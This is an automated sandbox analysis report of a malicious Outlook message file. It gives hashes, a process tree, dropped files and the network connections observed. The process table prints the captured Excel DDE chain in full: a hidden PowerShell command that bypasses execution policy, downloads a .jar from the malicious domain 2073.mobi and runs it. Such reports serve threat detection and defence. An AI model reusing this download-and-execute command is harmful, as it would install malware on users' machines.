File name: | FW 12 22 43 Sel amlar hay irli calismalar p arca d osyasi .msg |
Full analysis: | https://app.any.run/tasks/734ad156-50f6-4b24-af26-46f7d11d181d |
Verdict: | Malicious activity |
Analysis date: | April 23, 2019, 09:21:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | C01E7AEE0273792C49BF62DFE438780D |
SHA1: | 9216A2DAED28519E83B00B5793E0C1FD25697F48 |
SHA256: | 452C337A9D71E85B8A3727BEF94520443F04211F6ADCA9A45015FDBD1C090824 |
SSDEEP: | 1536:y/bmQCqQS5A0UXOb7JEDTCFmKOTKoKKKhZZ58V3SSy2DhfXXTnnnPjtAAA:y/bTCqdBpGbKOTKoKKKhZZ5G |
.msg | | | Outlook Message (58.9) |
---|---|---|
.oft | | | Outlook Form Template (34.4) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3864 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\FW 12 22 43 Sel amlar hay irli calismalar p arca d osyasi .msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
1300 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3816 | CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://2073.mobi\" ,\" %tmp%\\ZINreb.jar\") }" & %tmp%\\ZINreb.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2220 | powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://2073.mobi\" ,\" C:\Users\admin\AppData\Local\Temp\\ZINreb.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DB4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E295D9C.dat | image | |
MD5:3D5F732E72E96EF1EC2F3877C172397E | SHA256:D63218A5F04FE3924E83EE3B190FE8D1365FB6B04170FEDC7635C30F61F9B006 | |||
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFA25047.dat | image | |
MD5:BD9EF18DB6EF932C03E93A6DA9CD4CE7 | SHA256:490ACF9B24FAD678AB25498745243E536C85D76046C9709757DFA0BF3546439F | |||
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:F538C5CECA44D198F32BEAF9BD83B6C1 | SHA256:0381559AACD57F5AF3BA32B3D3732F3A6CA085C8A0937647EB4D5956FC006051 | |||
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7A1E8ED.dat | image | |
MD5:7327A31C0D0A0AD1D8C508BD43CF886E | SHA256:787452BC75841BDDDC9FDDBCA20934665F0FE63E6B7E8CB47950B7E7122D802D | |||
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3C96A8.dat | image | |
MD5:E9464B730CF4BDA59247CD2E56E68674 | SHA256:FA00F7E2C5B6EA2EA94FCEB4AC5612E4C8E8A8BCF5B7678CB005C78386BCB044 | |||
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E832CA2.dat | image | |
MD5:B1A0ABA9E8A52389FED582D9EF821594 | SHA256:A163590CC55B4992562A8E445785E2CFDC9E03CA75A11CAE57894C00B9028E11 | |||
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3860027F.dat | image | |
MD5:580224CE062B2BC1F9B7B9AD998FAFEC | SHA256:106CB6B2A07BA9D7EC3477F1EFC5F12C50EB6BE9C5003DA876BC4FDB27A2E0FF | |||
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94FD3AF6.dat | image | |
MD5:69B7FC9EFFA301E4238337F80F7B1943 | SHA256:3D46E040A7D64A865A19737100650A468E02CDC78B15124AC1924C90A1A14AD0 | |||
3864 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C45BA74.dat | image | |
MD5:B07BEE671DC501FFDD2A7A92C4C12EEB | SHA256:70AFAFB0193E9425AA23313B43FE1C1C7D54BF4E9D74FD1243D4073203FDC750 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2220 | powershell.exe | GET | 404 | 23.254.215.182:80 | http://2073.mobi/ | US | — | — | malicious |
3864 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3864 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2220 | powershell.exe | 23.254.215.182:80 | 2073.mobi | Hostwinds LLC. | US | malicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
2073.mobi |
| malicious |